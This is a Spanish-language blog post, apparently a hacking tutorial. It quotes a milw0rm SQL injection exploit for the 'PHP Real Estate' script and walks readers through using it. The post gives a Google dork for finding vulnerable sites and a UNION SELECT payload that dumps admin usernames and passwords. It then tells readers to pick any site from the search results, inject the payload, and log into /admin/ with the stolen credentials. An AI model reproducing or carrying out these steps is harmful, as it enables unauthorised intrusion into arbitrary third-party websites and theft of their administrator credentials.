# Tutorial para explotar bug en php real estate. #
haha bueno, nuevo diseño, nuevo post primer post con este nuevo diseño diria, y hare como un “minitutorial” de como explotar php real estate.
acontinuacion paso a explicar, como aplicar sql inyeccion en php real estate.
1) conocer el xploit que usaremos, que es el siguiente:
–==+================================================================================+==–
–==+ PHP Real Estate SQL Injection Vulnerbilitys +==–
–==+================================================================================+==–AUTHOR: t0pP8uZz & xprog
SITE: http://phprealestatescript.com
DORK: “Browse with Interactive Map”DESCRIPTION:
pull admin info from databaseEXPLOITS:
www.site.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*NOTE/TIP:
admin login is at /admin/GREETZ: milw0rm.com, h4ck-y0u.org !
–==+================================================================================+==–
–==+ PHP Real Estate SQL Injection Vulnerbilitys +==–
–==+================================================================================+==–# milw0rm.com [2007-12-14]
##############################################################
Empesemos paso a paso detalladamente a analizar el xploit:
a- como vemos, anteriormente, tenemos el dork que nos dara las webs vulnerables al xploit.
b- aki tenemos la descripcion del xploit.
c- aki tenemos la inyeccion sql, que aplicaremos a la web.
d- aki tenemos una nota, que nos dice que el pass que nos de el resultado de la inyeccion sera aplicado en /admin/
############################################################
############################################################
Anteriormente estan los pasos detalladamente explicados uno por uno.
# Acontinuación, veremos el procedimiendo para aplicar el xploit.
1) Iremos a www[dot]google[dot]com, y colocaremos el dork de xploit, en el campo de busqueda.
2) como veran les saldran varias webs, escojeremos 1, de ellas.
3) luego aplicaremos la inyeccion sql en la web
Ejemplo:
elegimos esta web -> www.asdasd.com
# con la inyeccion sql tendria que quedar algo asi:
# www.asdasd.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
4) Ahora si la web es vulnerable nos tendria que salir el pass y el user algo asi: xxx:xxx, es decir user:pass.
5) para logear como nos indica antes el xploit, iremos a /admin/ e intruduciremos el user y el pass.
Bueno creo que aqui termina el minituto, que es cortito y sencillo pero creo que entedible, cualqier duda qe tengan me comentan y les explico sin ningun problema.
Salu2.
